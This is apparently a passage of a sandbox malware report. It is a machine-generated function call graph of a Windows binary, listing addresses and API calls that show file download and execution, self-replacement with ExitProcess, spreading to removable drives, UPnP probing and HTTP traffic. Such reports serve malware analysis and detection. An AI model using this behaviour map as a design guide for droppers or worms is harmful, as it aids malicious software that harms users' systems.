4509->4507 4511 40d486 4510->4511 4512 40a1b0 __aligned_recalloc_base 3 API calls 4511->4512 4512->4505 4516 40c3f0 4513->4516 4517 40c423 4516->4517 4518 40c40e 4516->4518 4520 40796a 4517->4520 4548 40c5d0 4517->4548 4522 40c450 4518->4522 4520->4362 4520->4365 4523 40c502 4522->4523 4524 40c479 4522->4524 4526 409d90 7 API calls 4523->4526 4547 40c4fa 4523->4547 4524->4547 4582 409d90 4524->4582 4528 40c528 4526->4528 4530 402420 7 API calls 4528->4530 4528->4547 4532 40c555 4530->4532 4534 4024e0 10 API calls 4532->4534 4536 40c56f 4534->4536 4535 40c4cf 4537 402420 7 API calls 4535->4537 4538 402420 7 API calls 4536->4538 4539 40c4e0 4537->4539 4540 40c580 4538->4540 4541 4024e0 10 API calls 4539->4541 4542 4024e0 10 API calls 4540->4542 4541->4547 4543 40c59a 4542->4543 4544 402420 7 API calls 4543->4544 4545 40c5ab 4544->4545 4546 4024e0 10 API calls 4545->4546 4546->4547 4547->4520 4549 40c5f9 4548->4549 4550 40c6aa 4548->4550 4551 40c6a2 4549->4551 4552 409d90 7 API calls 4549->4552 4550->4551 4554 409d90 7 API calls 4550->4554 4551->4520 4553 40c60f 4552->4553 4553->4551 4556 402420 7 API calls 4553->4556 4555 40c6ce 4554->4555 4555->4551 4558 402420 7 API calls 4555->4558 4557 40c633 4556->4557 4559 409d90 7 API calls 4557->4559 4560 40c6f2 4558->4560 4561 40c642 4559->4561 4562 409d90 7 API calls 4560->4562 4563 4024e0 10 API calls 4561->4563 4564 40c701 4562->4564 4565 40c66b 4563->4565 4566 4024e0 10 API calls 4564->4566 4567 40a1b0 __aligned_recalloc_base 3 API calls 4565->4567 4568 40c72a 4566->4568 4569 40c677 4567->4569 4570 40a1b0 __aligned_recalloc_base 3 API calls 4568->4570 4571 402420 7 API calls 4569->4571 4572 40c736 4570->4572 4573 40c688 4571->4573 4574 402420 7 API calls 4572->4574 4575 4024e0 10 API calls 4573->4575 4576 40c747 4574->4576 4575->4551 4577 4024e0 10 API calls 4576->4577 4578 40c761 4577->4578 4579 402420 7 API calls 4578->4579 4580 40c772 4579->4580 4581 4024e0 10 API calls 4580->4581 4581->4551 4593 409db0 4582->4593 4585 402420 4614 409fa0 4585->4614 4590 4024e0 4621 402540 4590->4621 4592 4024ff _invalid_parameter 4592->4535 4602 409e50 GetCurrentProcessId 4593->4602 4595 409dbb 4596 409dc7 __aligned_recalloc_base 4595->4596 4603 409e70 4595->4603 4598 409d9e 4596->4598 4599 409de2 HeapAlloc 4596->4599 4598->4547 4598->4585 4599->4598 4600 409e09 __aligned_recalloc_base 4599->4600 4600->4598 4601 409e24 memset 4600->4601 4601->4598 4602->4595 4611 409e50 GetCurrentProcessId 4603->4611 4605 409e79 4606 409e96 HeapCreate 4605->4606 4612 409ee0 GetProcessHeaps 4605->4612 4608 409eb0 HeapSetInformation GetCurrentProcessId 4606->4608 4609 409ed7 4606->4609 4608->4609 4609->4596 4611->4605 4613 409e8c 4612->4613 4613->4606 4613->4609 4615 409db0 __aligned_recalloc_base 7 API calls 4614->4615 4616 40242b 4615->4616 4617 402820 4616->4617 4618 40282a 4617->4618 4619 409fa0 __aligned_recalloc_base 7 API calls 4618->4619 4620 402438 4619->4620 4620->4590 4622 40258e 4621->4622 4624 402551 4621->4624 4623 409fa0 __aligned_recalloc_base 7 API calls 4622->4623 4622->4624 4627 4025b2 _invalid_parameter 4623->4627 4624->4592 4625 4025e2 memcpy 4626 402606 _invalid_parameter 4625->4626 4629 40a1b0 __aligned_recalloc_base 3 API calls 4626->4629 4627->4625 4631 40a1b0 4627->4631 4629->4624 4638 409e50 GetCurrentProcessId 4631->4638 4633 40a1bb 4634 4025df 4633->4634 4639 40a0f0 4633->4639 4634->4625 4637 40a1d7 HeapFree 4637->4634 4638->4633 4640 40a120 HeapValidate 4639->4640 4641 40a140 4639->4641 4640->4641 4641->4634 4641->4637 4659 40a220 4642->4659 4645 40c861 4645->4426 4648 40a1b0 __aligned_recalloc_base 3 API calls 4648->4645 4872 409fe0 4649->4872 4652 405d2a memcpy 4653 40a220 8 API calls 4652->4653 4654 405d61 4653->4654 4882 40c190 4654->4882 4657 405de8 4657->4426 4660 40a24d 4659->4660 4661 409fa0 __aligned_recalloc_base 7 API calls 4660->4661 4662 40a262 4660->4662 4663 40a264 memcpy 4660->4663 4661->4660 4662->4645 4664 40bd30 4662->4664 4663->4660 4672 40bd3a 4664->4672 4666 40bd59 4666->4645 4666->4648 4668 40bd71 memcmp 4668->4672 4669 40bd98 4671 40a1b0 __aligned_recalloc_base 3 API calls 4669->4671 4670 40a1b0 __aligned_recalloc_base 3 API calls 4670->4672 4671->4666 4672->4666 4672->4668 4672->4669 4672->4670 4673 40c220 4672->4673 4687 407af0 4672->4687 4674 40c22f __aligned_recalloc_base 4673->4674 4675 409fa0 __aligned_recalloc_base 7 API calls 4674->4675 4677 40c239 4674->4677 4676 40c2c8 4675->4676 4676->4677 4678 402420 7 API calls 4676->4678 4677->4672 4679 40c2dd 4678->4679 4680 402420 7 API calls 4679->4680 4681 40c2e5 4680->4681 4683 40c33d __aligned_recalloc_base 4681->4683 4690 40c390 4681->4690 4695 402470 4683->4695 4686 402470 3 API calls 4686->4677 4803 409d10 4687->4803 4691 4024e0 10 API calls 4690->4691 4692 40c3a4 4691->4692 4701 4026f0 4692->4701 4694 40c3bc 4694->4681 4696 4024ce 4695->4696 4699 402484 _invalid_parameter 4695->4699 4696->4686 4697 4024ac 4698 40a1b0 __aligned_recalloc_base 3 API calls 4697->4698 4698->4696 4699->4697 4700 40a1b0 __aligned_recalloc_base 3 API calls 4699->4700 4700->4697 4704 402710 4701->4704 4703 40270a 4703->4694 4705 402724 4704->4705 4706 402540 __aligned_recalloc_base 10 API calls 4705->4706 4707 40276d 4706->4707 4708 402540 __aligned_recalloc_base 10 API calls 4707->4708 4709 40277d 4708->4709 4710 402540 __aligned_recalloc_base 10 API calls 4709->4710 4711 40278d 4710->4711 4712 402540 __aligned_recalloc_base 10 API calls 4711->4712 4713 40279d 4712->4713 4714 4027a6 4713->4714 4715 4027cf 4713->4715 4719 403e20 4714->4719 4736 403df0 4715->4736 4718 4027c7 _invalid_parameter 4718->4703 4720 402820 _invalid_parameter 7 API calls 4719->4720 4721 403e37 4720->4721 4722 402820 _invalid_parameter 7 API calls 4721->4722 4723 403e46 4722->4723 4724 402820 _invalid_parameter 7 API calls 4723->4724 4725 403e55 4724->4725 4726 402820 _invalid_parameter 7 API calls 4725->4726 4735 403e64 _invalid_parameter 4726->4735 4728 40400f _invalid_parameter 4729 402850 _invalid_parameter 3 API calls 4728->4729 4730 404035 _invalid_parameter 4728->4730 4729->4728 4731 402850 _invalid_parameter 3 API calls 4730->4731 4732 40405b _invalid_parameter 4730->4732 4731->4730 4733 402850 _invalid_parameter 3 API calls 4732->4733 4734 404081 4732->4734 4733->4732 4734->4718 4735->4728 4739 402850 4735->4739 4743 404090 4736->4743 4738 403e0c 4738->4718 4740 402866 4739->4740 4741 40285b 4739->4741 4740->4735 4742 40a1b0 __aligned_recalloc_base 3 API calls 4741->4742 4742->4740 4744 4040a6 _invalid_parameter 4743->4744 4745 4040b8 _invalid_parameter 4744->4745 4746 4040dd 4744->4746 4750 404103 4744->4750 4745->4738 4773 403ca0 4746->4773 4748 40413d 4783 404680 4748->4783 4749 40415e 4752 402820 _invalid_parameter 7 API calls 4749->4752 4750->4748 4750->4749 4753 40416f 4752->4753 4754 402820 _invalid_parameter 7 API calls 4753->4754 4755 40417e 4754->4755 4756 402820 _invalid_parameter 7 API calls 4755->4756 4757 40418d 4756->4757 4758 402820 _invalid_parameter 7 API calls 4757->4758 4759 40419c 4758->4759 4796 403d70 4759->4796 4761 402820 _invalid_parameter 7 API calls 4762 4041ca _invalid_parameter 4761->4762 4762->4761 4763 404284 _invalid_parameter 4762->4763 4764 402850 _invalid_parameter 3 API calls 4763->4764 4765 4045a3 _invalid_parameter 4763->4765 4764->4763 4766 402850 _invalid_parameter 3 API calls 4765->4766 4767 4045c9 _invalid_parameter 4765->4767 4766->4765 4768 402850 _invalid_parameter 3 API calls 4767->4768 4769 4045ef _invalid_parameter 4767->4769 4768->4767 4770 402850 _invalid_parameter 3 API calls 4769->4770 4771 404615 _invalid_parameter 4769->4771 4770->4769 4771->4745 4772 402850 _invalid_parameter 3 API calls 4771->4772 4772->4771 4774 403cae 4773->4774 4775 402820 _invalid_parameter 7 API calls 4774->4775 4776 403ccb 4775->4776 4777 402820 _invalid_parameter 7 API calls 4776->4777 4779 403cda _invalid_parameter 4777->4779 4778 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4778->4779 4779->4778 4780 403d3a _invalid_parameter 4779->4780 4781 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4780->4781 4782 403d60 4780->4782 4781->4780 4782->4745 4784 402820 _invalid_parameter 7 API calls 4783->4784 4785 404697 4784->4785 4786 402820 _invalid_parameter 7 API calls 4785->4786 4787 4046a6 4786->4787 4788 402820 _invalid_parameter 7 API calls 4787->4788 4789 4046b5 _invalid_parameter 4788->4789 4790 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4789->4790 4791 404841 _invalid_parameter 4789->4791 4790->4789 4792 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4791->4792 4793 404867 _invalid_parameter 4791->4793 4792->4791 4794 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4793->4794 4795 40488d 4793->4795 4794->4793 4795->4745 4797 402820 _invalid_parameter 7 API calls 4796->4797 4798 403d7f _invalid_parameter 4797->4798 4799 403ca0 _invalid_parameter 9 API calls 4798->4799 4801 403db8 _invalid_parameter 4799->4801 4800 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4800->4801 4801->4800 4802 403de3 4801->4802 4802->4762 4804 409d22 4803->4804 4807 409c70 4804->4807 4808 409fa0 __aligned_recalloc_base 7 API calls 4807->4808 4813 409c80 4808->4813 4809 407b0f 4809->4672 4811 409cbc 4814 40a1b0 __aligned_recalloc_base 3 API calls 4811->4814 4813->4809 4813->4811 4816 4091a0 4813->4816 4823 409790 4813->4823 4828 409b60 4813->4828 4814->4809 4817 4091a9 4816->4817 4818 4091b3 4816->4818 4817->4813 4818->4817 4819 4091f6 memset 4818->4819 4819->4817 4820 409217 4819->4820 4820->4817 4821 40921d memcpy 4820->4821 4836 408f70 4821->4836 4824 40979d 4823->4824 4825 4097a7 4823->4825 4824->4813 4825->4824 4826 40989f memcpy 4825->4826 4841 4094c0 4825->4841 4826->4825 4829 409b6c 4828->4829 4831 409b76 4828->4831 4829->4813 4830 4094c0 64 API calls 4832 409bf7 4830->4832 4831->4829 4831->4830 4832->4829 4833 408f70 6 API calls 4832->4833 4834 409c16 4833->4834 4834->4829 4835 409c2b memcpy 4834->4835 4835->4829 4837 408fbe 4836->4837 4839 408f7e 4836->4839 4837->4817 4839->4837 4840 408eb0 6 API calls 4839->4840 4840->4839 4842 4094d0 4841->4842 4843 4094da 4841->4843 4842->4825 4843->4842 4851 409300 4843->4851 4846 409618 memcpy 4846->4842 4848 409637 memcpy 4849 409761 4848->4849 4850 4094c0 62 API calls 4849->4850 4850->4842 4852 40930d 4851->4852 4853 409317 4851->4853 4852->4842 4852->4846 4852->4848 4853->4852 4854 4093a0 4853->4854 4856 4093a5 4853->4856 4857 409388 4853->4857 4862 408c60 4854->4862 4858 408f70 6 API calls 4856->4858 4860 408f70 6 API calls 4857->4860 4858->4854 4860->4854 4861 40944c memset 4861->4852 4863 408c79 4862->4863 4871 408c6f 4862->4871 4864 408b30 9 API calls 4863->4864 4863->4871 4865 408d72 4864->4865 4866 409fa0 __aligned_recalloc_base 7 API calls 4865->4866 4867 408dc1 4866->4867 4868 4089a0 46 API calls 4867->4868 4867->4871 4869 408dee 4868->4869 4870 40a1b0 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4869->4870 4870->4871 4871->4852 4871->4861 4891 409e50 GetCurrentProcessId 4872->4891 4874 409feb 4875 409e70 __aligned_recalloc_base 5 API calls 4874->4875 4880 409ff7 __aligned_recalloc_base 4874->4880 4875->4880 4876 405d15 4876->4652 4876->4657 4877 40a0a0 HeapAlloc 4877->4880 4878 40a06a HeapReAlloc 4878->4880 4879 40a0f0 __aligned_recalloc_base HeapValidate 4879->4880 4880->4876 4880->4877 4880->4878 4880->4879 4881 40a1b0 __aligned_recalloc_base 3 API calls 4880->4881 4881->4880 4885 40c19b 4882->4885 4883 409fa0 __aligned_recalloc_base 7 API calls 4883->4885 4884 405dad 4884->4657 4886 407310 4884->4886 4885->4883 4885->4884 4887 409fa0 __aligned_recalloc_base 7 API calls 4886->4887 4888 407320 4887->4888 4889 407367 4888->4889 4890 40732c memcpy CreateThread CloseHandle 4888->4890 4889->4657 4890->4889 4892 407370 GetTickCount srand rand Sleep 4890->4892 4891->4874 4893 4073a7 4892->4893 4894 4073fd 4892->4894 4895 4073b6 StrChrA 4893->4895 4898 4073fb 4893->4898 4902 40eae0 9 API calls 4893->4902 4896 40eae0 61 API calls 4894->4896 4894->4898 4895->4893 4896->4898 4897 40a1b0 __aligned_recalloc_base 3 API calls 4899 407428 4897->4899 4898->4897 4903 40ed03 InternetCloseHandle Sleep 4902->4903 4904 40eba3 InternetOpenUrlW 4902->4904 4907 4073e5 Sleep 4903->4907 4908 40ed2a 6 API calls 4903->4908 4905 40ebd2 CreateFileW 4904->4905 4906 40ecf6 InternetCloseHandle 4904->4906 4909 40ec01 InternetReadFile 4905->4909 4910 40ece9 CloseHandle 4905->4910 4906->4903 4907->4893 4908->4907 4911 40eda6 wsprintfW DeleteFileW 4908->4911 4912 40ec54 CloseHandle wsprintfW DeleteFileW 4909->4912 4913 40ec25 4909->4913 4910->4906 4914 40e7c0 21 API calls 4911->4914 4930 40e7c0 CreateFileW 4912->4930 4913->4912 4915 40ec2e WriteFile 4913->4915 4917 40eddb 4914->4917 4915->4909 4919 40ede5 Sleep 4917->4919 4920 40ee19 DeleteFileW 4917->4920 4923 40e980 6 API calls 4919->4923 4920->4907 4921 40eca0 Sleep 4924 40e980 6 API calls 4921->4924 4922 40ecdc DeleteFileW 4922->4910 4925 40edfc 4923->4925 4926 40ecb7 4924->4926 4925->4907 4928 40ee0f ExitProcess 4925->4928 4927 40ecd3 4926->4927 4929 40eccb ExitProcess 4926->4929 4927->4910 4931 40e805 CreateFileMappingW 4930->4931 4932 40e91a 4930->4932 4933 40e910 CloseHandle 4931->4933 4934 40e826 MapViewOfFile 4931->4934 4935 40e920 CreateFileW 4932->4935 4936 40e971 4932->4936 4933->4932 4937 40e845 GetFileSize 4934->4937 4938 40e906 CloseHandle 4934->4938 4939 40e942 WriteFile CloseHandle 4935->4939 4940 40e968 4935->4940 4936->4921 4936->4922 4941 40e861 4937->4941 4942 40e8fc UnmapViewOfFile 4937->4942 4938->4933 4939->4940 4943 40a1b0 __aligned_recalloc_base 3 API calls 4940->4943 4952 40c7f0 4941->4952 4942->4938 4943->4936 4946 40c190 7 API calls 4947 40e8b0 4946->4947 4947->4942 4948 40e8cd memcmp 4947->4948 4948->4942 4949 40e8e9 4948->4949 4950 40a1b0 __aligned_recalloc_base 3 API calls 4949->4950 4951 40e8f2 4950->4951 4951->4942 4953 40c220 10 API calls 4952->4953 4954 40c814 4953->4954 4954->4942 4954->4946 4956 40d86e 4955->4956 4957 40d73d htons inet_addr setsockopt 4955->4957 4956->4435 4958 40aa80 8 API calls 4957->4958 4959 40d7b6 bind lstrlenA sendto ioctlsocket 4958->4959 4960 40d80b 4959->4960 4961 40d832 4960->4961 4964 409fe0 9 API calls 4960->4964 5003 40d890 4960->5003 5012 40ab40 shutdown closesocket 4961->5012 4964->4960 5019 40dbc0 memset InternetCrackUrlA InternetOpenA 4965->5019 4968 40da9e 4968->4435 4971 40a1b0 __aligned_recalloc_base 3 API calls 4971->4968 4972 40da6b 4972->4971 4977 40da61 SysFreeString 4977->4972 5126 40aa40 inet_addr 4980->5126 4983 40aadc connect 4984 40aaf0 getsockname 4983->4984 4985 40ab24 4983->4985 4984->4985 5129 40ab40 shutdown closesocket 4985->5129 4987 40ab2d 4988 40e470 4987->4988 5130 40aa20 inet_ntoa 4988->5130 4990 40e486 4991 40c9f0 11 API calls 4990->4991 4992 40e4a5 4991->4992 4993 40d6cc 4992->4993 5131 40e4f0 memset InternetCrackUrlA InternetOpenA 4992->5131 4993->4443 4996 40e4dc 4998 40a1b0 __aligned_recalloc_base 3 API calls 4996->4998 4997 40a1b0 __aligned_recalloc_base 3 API calls 4997->4996 4998->4993 5002 40a2d4 4999->5002 5000 40a2da 5000->4434 5001 40a1b0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5001->5002 5002->5000 5002->5001 5008 40d8ac 5003->5008 5004 40d974 5004->4960 5005 40d8c8 recvfrom 5006 40d8f6 StrCmpNIA 5005->5006 5007 40d8e9 Sleep 5005->5007 5006->5008 5009 40d915 StrStrIA 5006->5009 5007->5008 5008->5004 5008->5005 5009->5008 5010 40d936 StrChrA 5009->5010 5013 40c8a0 5010->5013 5012->4956 5014 40c8ab 5013->5014 5015 40c8b1 lstrlenA 5014->5015 5016 40c8c4 5014->5016 5017 409fa0 __aligned_recalloc_base 7 API calls 5014->5017 5018 40c8e0 memcpy 5014->5018 5015->5014 5015->5016 5016->5008 5017->5014 5018->5014 5018->5016 5020 40dc61 InternetConnectA 5019->5020 5021 40d99a 5019->5021 5022 40ddca InternetCloseHandle 5020->5022 5023 40dc9a HttpOpenRequestA 5020->5023 5021->4968 5032 40dab0 5021->5032 5022->5021 5024 40dcd0 HttpSendRequestA 5023->5024 5025 40ddbd InternetCloseHandle 5023->5025 5026 40ddb0 InternetCloseHandle 5024->5026 5029 40dced 5024->5029 5025->5022 5026->5025 5027 40dd3b 5027->5026 5028 40dd0e InternetReadFile 5028->5027 5028->5029 5029->5027 5029->5028 5030 409fe0 9 API calls 5029->5030 5031 40dd56 memcpy 5030->5031 5031->5029 5061 405690 5032->5061 5035 40d9b3 5035->4972 5042 40e420 5035->5042 5036 40dada SysAllocString 5037 40daf1 CoCreateInstance 5036->5037 5038 40dba7 5036->5038 5039 40db9d SysFreeString 5037->5039 5041 40db16 5037->5041 5040 40a1b0 __aligned_recalloc_base 3 API calls 5038->5040 5039->5038 5040->5035 5041->5039 5078 40df70 5042->5078 5045 40ddf0 5083 40e240 5045->5083 5048 40da32 5048->4977 5058 40c9f0 5048->5058 5051 40e3a0 6 API calls 5052 40de47 5051->5052 5052->5048 5100 40e060 5052->5100 5055 40e060 6 API calls 5057 40de7f 5055->5057 5057->5048 5105 40df10 5057->5105 5121 40c960 5058->5121 5066 40569d 5061->5066 5062 4056a3 lstrlenA 5062->5066 5067 4056b6 5062->5067 5064 409fa0 __aligned_recalloc_base 7 API calls 5064->5066 5066->5062 5066->5064 5066->5067 5068 40a1b0 __aligned_recalloc_base 3 API calls 5066->5068 5069 405630 5066->5069 5073 4055e0 5066->5073 5067->5035 5067->5036 5068->5066 5070 405647 MultiByteToWideChar 5069->5070 5071 40563a lstrlenA 5069->5071 5072 40566c 5070->5072 5071->5070 5072->5066 5074 4055eb 5073->5074 5075 4055f1 lstrlenA 5074->5075 5076 405630 2 API calls 5074->5076 5077 405627 5074->5077 5075->5074 5076->5074 5077->5066 5081 40df96 5078->5081 5079 40da1d 5079->4972 5079->5045 5080 40e013 lstrcmpiW 5080->5081 5082 40e02b SysFreeString 5080->5082 5081->5079 5081->5080 5081->5082 5082->5081 5085 40e266 5083->5085 5084 40de0b 5084->5048 5095 40e3a0 5084->5095 5085->5084 5086 40e2f3 lstrcmpiW 5085->5086 5087 40e373 SysFreeString 5086->5087 5088 40e306 5086->5088 5087->5084 5089 40df10 2 API calls 5088->5089 5090 40e314 5089->5090 5090->5087 5091 40e365 5090->5091 5092 40e343 lstrcmpiW 5090->5092 5091->5087 5093 40e355 5092->5093 5094 40e35b SysFreeString 5092->5094 5093->5094 5094->5091 5096 40df10 2 API calls 5095->5096 5097 40e3bb 5096->5097 5098 40e240 6 API calls 5097->5098 5099 40de29 5097->5099 5098->5099 5099->5048 5099->5051 5101 40df10 2 API calls 5100->5101 5103 40e07b 5101->5103 5102 40de65 5102->5055 5102->5057 5103->5102 5109 40e0e0 5103->5109 5106 40df36 5105->5106 5107 40df70 2 API calls 5106->5107 5108 40df4d 5106->5108 5107->5108 5108->5048 5111 40e106 5109->5111 5110 40e21d 5110->5102 5111->5110 5112 40e193 lstrcmpiW 5111->5112 5113 40e213 SysFreeString 5112->5113 5114 40e1a6 5112->5114 5113->5110 5115 40df10 2 API calls 5114->5115 5117 40e1b4 5115->5117 5116 40e205 5116->5113 5117->5113 5117->5116 5118 40e1e3 lstrcmpiW 5117->5118 5119 40e1f5 5118->5119 5120 40e1fb SysFreeString 5118->5120 5119->5120 5120->5116 5125 40c96d 5121->5125 5122 40c910 _vscprintf wvsprintfA 5122->5125 5123 40c988 SysFreeString 5123->4977 5124 409fe0 9 API calls 5124->5125 5125->5122 5125->5123 5125->5124 5127 40aa6c socket 5126->5127 5128 40aa59 gethostbyname 5126->5128 5127->4983 5127->4987 5128->5127 5129->4987 5130->4990 5132 40e4c7 5131->5132 5133 40e594 InternetConnectA 5131->5133 5132->4996 5132->4997 5134 40e714 InternetCloseHandle 5133->5134 5135 40e5cd HttpOpenRequestA 5133->5135 5134->5132 5136 40e603 HttpAddRequestHeadersA HttpSendRequestA 5135->5136 5137 40e707 InternetCloseHandle 5135->5137 5138 40e6fa InternetCloseHandle 5136->5138 5139 40e64d 5136->5139 5137->5134 5138->5137 5140 40e664 InternetReadFile 5139->5140 5141 40e691 5139->5141 5142 409fe0 9 API calls 5139->5142 5140->5139 5140->5141 5141->5138 5143 40e6ac memcpy 5142->5143 5143->5139 5149 407067 5144->5149 5145 40723b 5147 407244 SysFreeString 5145->5147 5148 40700b SysFreeString 5145->5148 5146 40a1b0 __aligned_recalloc_base 3 API calls 5146->5145 5147->5148 5148->4447 5150 4072c0 CoCreateInstance 5149->5150 5151 4071b6 SysAllocString 5149->5151 5152 407082 5149->5152 5150->5149 5151->5149 5151->5152 5152->5145 5152->5146 5154 40beca 5153->5154 5155 40bece 5153->5155 5154->4453 5157 40be80 CryptAcquireContextW 5155->5157 5158 40bebb 5157->5158 5159 40be9d CryptGenRandom CryptReleaseContext 5157->5159 5158->5154 5159->5158 5160->4469 5212 40add0 gethostname 5161->5212 5164 40aeb9 5164->4469 5166 40aecc strcmp 5166->5164 5167 40aee1 5166->5167 5216 40aa20 inet_ntoa 5167->5216 5169 40aeef strstr 5170 40af40 5169->5170 5171 40aeff 5169->5171 5219 40aa20 inet_ntoa 5170->5219 5217 40aa20 inet_ntoa 5171->5217 5174 40af4e strstr 5176 40af5e 5174->5176 5177 40af9f 5174->5177 5175 40af0d strstr 5175->5164 5178 40af1d 5175->5178 5220 40aa20 inet_ntoa 5176->5220 5222 40aa20 inet_ntoa 5177->5222 5218 40aa20 inet_ntoa 5178->5218 5182 40af6c strstr 5182->5164 5185 40af7c 5182->5185 5183 40afad strstr 5186 40afbd 5183->5186 5187 40affe EnterCriticalSection 5183->5187 5184 40af2b strstr 5184->5164 5184->5170 5221 40aa20 inet_ntoa 5185->5221 5223 40aa20 inet_ntoa 5186->5223 5188 40b016 5187->5188 5197 40b041 5188->5197 5225 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5188->5225 5191 40afcb strstr 5191->5164 5193 40afdb 5191->5193 5192 40af8a strstr 5192->5164 5192->5177 5224 40aa20 inet_ntoa 5193->5224 5196 40b13a LeaveCriticalSection 5196->5164 5197->5196 5199 409d90 7 API calls 5197->5199 5198 40afe9 strstr 5198->5164 5198->5187 5200 40b085 5199->5200 5200->5196 5226 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5200->5226 5202 40b0a3 5203 40b0d0 5202->5203 5204 40b0c6 Sleep 5202->5204 5206 40b0f5 5202->5206 5205 40a1b0 __aligned_recalloc_base 3 API calls 5203->5205 5204->5202 5205->5206 5206->5196 5227 40ab80 5206->5227 5208->4481 5210 40ab80 14 API calls 5209->5210 5211 40ab73 LeaveCriticalSection 5210->5211 5211->4474 5213 40adf7 gethostbyname 5212->5213 5214 40ae13 5212->5214 5213->5214 5214->5164 5215 40aa20 inet_ntoa 5214->5215 5215->5166 5216->5169 5217->5175 5218->5184 5219->5174 5220->5182 5221->5192 5222->5183 5223->5191 5224->5198 5225->5197 5226->5202 5228 40ab94 5227->5228 5229 40ab8f 5227->5229 5230 409fa0 __aligned_recalloc_base 7 API calls 5228->5230 5229->5196 5232 40aba8 5230->5232 5231 40ac04 CreateFileW 5233 40ac53 InterlockedExchange 5231->5233 5234 40ac27 WriteFile FlushFileBuffers CloseHandle 5231->5234 5232->5229 5232->5231 5235 40a1b0 __aligned_recalloc_base 3 API calls 5233->5235 5234->5233 5235->5229 5237 40d25d 5236->5237 5238 40d193 5237->5238 5239 40d281 WaitForSingleObject 5237->5239 5238->4488 5238->4489 5239->5237 5240 40d29c CloseHandle 5239->5240 5240->5237 5246 407490 5241->5246 5242 4074b8 Sleep 5242->5246 5243 40756a Sleep 5243->5246 5244 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5271 40ea30 InternetOpenA 5244->5271 5246->5242 5246->5243 5246->5244 5247 40eae0 61 API calls 5246->5247 5247->5246 5249 405889 memset GetModuleHandleW 5248->5249 5250 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5249->5250 5250->5250 5251 405900 CreateWindowExW 5250->5251 5252 40592b 5251->5252 5253 40592d GetMessageA 5251->5253 5254 40595f ExitThread 5252->5254 5255 405941 TranslateMessage DispatchMessageA 5253->5255 5256 405957 5253->5256 5255->5253 5256->5249 5256->5254 5278 40e770 CreateFileW 5257->5278 5259 406bf0 5260 406d48 ExitThread 5259->5260 5262 406d38 Sleep 5259->5262 5263 406c29 5259->5263 5281 4063a0 GetLogicalDrives 5259->5281 5262->5259 5287 4062c0 5263->5287 5266 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5268 406cd6 wsprintfW 5266->5268 5269 406ceb wsprintfW 5266->5269 5267 406c5b 5268->5269 5293 4066b0 _chkstk 5269->5293 5272 40ea56 InternetOpenUrlA 5271->5272 5273 40eac8 Sleep 5271->5273 5274 40ea75 HttpQueryInfoA 5272->5274 5275 40eabe InternetCloseHandle 5272->5275 5273->5246 5276 40eab4 InternetCloseHandle 5274->5276 5277 40ea9e 5274->5277 5275->5273 5276->5275 5277->5276 5279 40e7b8 5278->5279 5280 40e79f GetFileSize CloseHandle 5278->5280 5279->5259 5280->5279 5286 4063cd 5281->5286 5282 406446 5282->5259 5283 4063dc RegOpenKeyExW 5284 4063fe RegQueryValueExW 5283->5284 5283->5286 5285 40643a RegCloseKey 5284->5285 5284->5286 5285->5286 5286->5282 5286->5283 5286->5285 5288 406319 5287->5288 5289 4062dc 5287->5289 5288->5266 5288->5267 5330 406320 GetDriveTypeW 5289->5330 5292 40630b lstrcpyW 5292->5288 5294 4066ce 6 API calls 5293->5294 5308 4066c7 5293->5308 5295 406782 5294->5295 5296 4067c4 PathFileExistsW 5294->5296 5297 40e770 3 API calls 5295->5297 5298 406874 PathFileExistsW 5296->5298 5299 4067d9 PathFileExistsW 5296->5299 5302 40678e 5297->5302 5300 406885 5298->5300 5301 4068ca FindFirstFileW 5298->5301 5303 406809 PathFileExistsW 5299->5303 5304 4067ea SetFileAttributesW DeleteFileW 5299->5304 5305 4068a5 5300->5305 5306 40688d 5300->5306 5301->5308 5328 4068f1 5301->5328 5302->5296 5307 4067a5 SetFileAttributesW DeleteFileW 5302->5307 5309 40681a CreateDirectoryW 5303->5309 5310 40683c PathFileExistsW 5303->5310 5304->5303 5312 406460 3 API calls 5305->5312 5335 406460 CoInitialize CoCreateInstance 5306->5335 5307->5296 5308->5267 5309->5310 5314 40682d SetFileAttributesW 5309->5314 5310->5298 5315 40684d CopyFileW 5310->5315 5316 4068a0 SetFileAttributesW 5312->5316 5313 4069b3 lstrcmpW 5317 4069c9 lstrcmpW 5313->5317 5313->5328 5314->5310 5315->5298 5318 406865 SetFileAttributesW 5315->5318 5316->5301 5317->5328 5318->5298 5320 406b8a FindNextFileW 5320->5313 5321 406ba6 FindClose 5320->5321 5321->5308 5322 406a0f lstrcmpiW 5322->5328 5323 406a76 PathMatchSpecW 5325 406a97 wsprintfW SetFileAttributesW DeleteFileW 5323->5325 5323->5328 5324 406af4 PathFileExistsW 5326 406b0a wsprintfW wsprintfW 5324->5326 5324->5328 5325->5328 5327 406b74 MoveFileExW 5326->5327 5326->5328 5327->5320 5328->5313 5328->5320 5328->5322 5328->5323 5328->5324 5339 406570 CreateDirectoryW wsprintfW FindFirstFileW 5328->5339 5331 4062ff 5330->5331 5332 406348 5330->5332 5331->5288 5331->5292 5332->5331 5333 40635c QueryDosDeviceW 5332->5333 5333->5331 5334 406376 StrCmpNW 5333->5334 5334->5331 5336 406496 5335->5336 5338 4064d2 5335->5338 5337 4064a0 wsprintfW 5336->5337 5336->5338 5337->5338 5338->5316 5340 4065c5 lstrcmpW 5339->5340 5341 40669f 5339->5341 5342 4065f1 5340->5342 5343 4065db lstrcmpW 5340->5343 5341->5328 5345 40666c FindNextFileW 5342->5345 5343->5342 5344 4065f3 wsprintfW wsprintfW 5343->5344 5344->5342 5346 406656 MoveFileExW 5344->5346 5345->5340 5347 406688 FindClose RemoveDirectoryW 5345->5347 5346->5345 5347->5341 5357 40d0d0 5362 401b60 5357->5362 5359 40d0e5 5360 40d104 5359->5360 5361 401b60 16 API calls 5359->5361 5361->5360 5363 401c42 